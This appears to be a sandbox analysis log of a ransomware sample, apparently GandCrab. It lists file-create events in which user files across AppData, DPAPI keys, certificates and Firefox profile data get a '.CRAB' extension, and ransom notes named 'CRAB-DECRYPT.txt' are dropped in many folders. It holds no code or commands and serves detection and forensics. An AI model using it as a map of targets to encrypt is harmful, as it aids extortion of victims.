Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2345716840-1148442690-1481144037-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2345716840-1148442690-1481144037-1000\83aa4cc77f591dfc2374580bbd95f6ba_500c0908-381e-49dc-a6a0-1a800e9a56e0.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Document Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Document Building Blocks\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Excel\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Excel\XLSTART\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Forms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\IME12\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\IMJP12\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\IMJP8_1\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\IMJP9_0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\356BZ594\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\N4CF7XJW\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\WIK9MYAA\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\ZE5P2FRT\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\MMC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\MS Project\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\MS Project\16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\MS Project\16\en-US\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\MS Project\16\en-US\Global.MPT.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Network\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Network\Connections\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Network\Connections\Pbk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\MSO1033.acl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\Database1.LNK.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\dhl_invoice_18553.LNK.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\Global.LNK.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\index.dat.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\My Documents.LNK.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\OneNote\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\OneNote\16.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\OneNote\16.0\Preferences.dat.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Outlook\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Outlook\Outlook.srs.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Outlook\Outlook.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\PowerPoint\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Proof\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\CREDHIST.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-2345716840-1148442690-1481144037-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-2345716840-1148442690-1481144037-1000\1862f3be-4467-4925-a93f-badcfb2203ba.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-2345716840-1148442690-1481144037-1000\2ab03421-ab9c-4d63-8433-08c1054d525a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-2345716840-1148442690-1481144037-1000\8d3ed5bb-9674-4045-8be3-b9270b93e90b.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-2345716840-1148442690-1481144037-1000\e9d127d6-64ac-4353-96d2-c19aaf9f738b.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-2345716840-1148442690-1481144037-1000\Preferred.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\Preferred.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\SYNCHIST.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Publisher\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Publisher Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Speech\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Access Parts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Access Parts\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\Normal.dotm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\~$Normal.dotm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\UProof\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Word\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Word\STARTUP\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\MmKV-KMDDGO I9QNLG2.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Extensions\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\minidumps\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
